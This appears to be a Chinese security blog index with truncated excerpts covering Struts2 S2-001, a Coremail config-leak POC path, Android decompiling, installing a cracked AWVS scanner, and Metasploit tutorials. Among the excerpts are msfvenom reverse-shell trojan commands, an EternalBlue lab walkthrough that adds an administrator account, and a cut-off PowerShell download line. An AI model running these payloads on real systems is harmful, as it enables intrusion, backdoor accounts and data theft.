【研究】Struts2漏洞之S2-001漏洞环境和POC
【研究】Struts2漏洞之S2-001漏洞环境和POC
1.环境
2.原理
3.影响版本
4.利用过程
POC
1.环境环境https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md这个搭环境很方便快捷,具体可以看说明,很简单
2.原理
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value}对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行
3.影响版本Struts 2.0.0 - Struts 2.0.8
4.利用过程环境打开![在这里插入图片描述][图片上传失败…(image-5bcfcf-1563099334703)]
这个漏洞的问题在于可以直接输入和直接回显将POC粘到一个输入框,点击Submit此后会将数据提交到后端,后端检测值是否为空,然后返回,满足漏洞前提
POC获取 ...
Coremail-0day敏感文件泄露漏洞送附批量检测脚本
漏洞介绍Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 [2] ,已成为中国用户实际使用最广泛的电子邮件系统。
2019年5月22日,国家信息安全漏洞共享平台(CNVD)收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统信息泄露漏洞(CNVD-2019-16798)。由于Coremail邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知Coremail服务器的系统配置文件,造成数据库连接参数等系统敏感配置信息泄露。
**泄露页:
POC:1/mailsms/s?func=ADMIN:appState&dumpConfig=/
**利用方式:
1 ...
Android反编译(apktool、dex2jar、jd-gui)三件套教程
Android反编译(apktool、dex2jar、jd-gui)三件套教程这个是网上流行的使用工具,我现在重新写一下屡一下思路
apk反编译软件有个组合套餐:apktool 、dex2jar、jd-jui,
我直接打包好了一套工具,也配置好了,使用可以直接用剩的再收集麻烦w这个下载地址:https://download.csdn.net/download/god_zzz/11241989
简单介绍一下,大概了解一下各自是干什么的:## apktool
可以反编译软件的布局文件、xml文件、AndroidManifest.xml和图片等。
## dex2jar
将apk反编译成java源码,也就是说把classes.dex转化成jar文件,反编译源码
## jd-gui源码文件转化成jar文件,这个打开直接查看jar的源码
**
开始反编译
第一步下载好工具和要测试的apk
然后使用
apktool使用注意
要确保他们三个在一个文件夹里面,然后打开CMD命令把路径切到这里
使用命令
1apktool d -f ***.apk
里面就是所要的文件,第一部分结束
第二部分 ...
Linux版awvs最新版v_190325161的安装记录
因为之前52的安装教程贴被删除了所以我自己重新记录一下方便以后的使用也是自己用的环境 -—我用的是2019的ubantu和Xshell
下载地址https://download.csdn.net/download/god\_zzz/11238215里面有三个:: 一个安装包一个破解文件一个安装说明
**
下面开始安装**
安装环境依赖(如果有问题先更新一下源)
[email protected]:~# sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 \-y
正在读取软件包列表… 完成 正在分析软件包的依赖关系树 正在读取状态信息… 完成 libxss1已经是最新版 (1:1.2.3-1)。 libxss1 已设置为手动安装。 将会同时安装下列软件: libasound2-datalibgtk-3-common libxdamage-dev 建议安装: alsa-utils 下列软件包将被升级:libasound2 libasound2-data libgtk-3-0 libgtk-3-common ...
MSF木马的简单利用
刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他环境和那一片的一样
msfvenom模块,首先生成.exe木马文件
1msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe
1.exe 就是木马 要把这个用各种方法去受害机运行
2. 输入msfconsole进入metasploi3. 进入监听模块
1use exploit/multi/handler
设置payload反弹
1set payload windows/meterpreter/reverse_tcp
设置监听ip端口
123set lhost 10.77.0.109set lport 4443要与木马一致
运行kali这边就准备完了,等待上线
在目标主机运行 1.exe 木马利用是之前的ms17010直接shell
1powershell (new-object System.Net.WebClient).DownloadFile( 'h ...
试试MSF的ms17-010永恒之蓝漏洞利用
试验环境(内网地址)
-win7(未打补丁开445) 10.77.0.128
kali 10.77.0.109
首先信息收集,探测
nmap意思一下
- nmap \-sS \-P0 \-A \-v 10.77.0.100
扫描漏洞
msfconsole 启动
1msfconsole
加载扫描exp
use auxiliary/scanner/smb/smb_ms17_010
1show options
设置目标ip
1set RHOST 10.77.0.128
运行
1run
发现可以利用
漏洞利用
加载攻击模块
1use exploit/windows/smb/ms17_010_eternalblue
设置参数
1set RHOST 10.77.0.128
运行
1run
运行成功 进去了
可以直接CMD命令
权限很高直接net user
12net user 123 1234 /add(用户名 密码)net localgroup administrators xxxx /add (将用户设置为管理员权限)
重新打 ...
vmtools坑
ubantu
但是…第一步:sudo apt-get autoremove open-vm-tools就告诉我,我没安装open-vm-tools
所以…就直接把open-vm-tools装上吧…
sudo apt-get install open-vm-tools-desktop
kali原来Kali2.0的官网早就有说明,官方自己开发了一个vmtools工具,好崩溃~~~~
apt-get install open-vm-tools-desktop fuse
Centos7 安装uwsgi失败
centos7 安装uwsgi失败
失败过程我是Centos 直接安装没有其他操作
按照网上部署部署uwsgi+nginx+django 教程
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
安装Python包管理easy_install 包 https://pypi.python.org/pypi/distribute
安装步骤:
12345> cd ~ wget> https://pypi.python.org/packages/source/d/distribute/distribute-0.6.49.tar.gz> tar xf distribute-0.6.49.tar.gz cd distribute-0.6.49 python2.7> setup.py install easy_install --version pip 包:> https://pypi.python.org/pypi/pip
发现没有自带没有安装 pip yum了pip之后使用pip安装pip install uwsgi报错一直没有解决错误代码ERROR: ...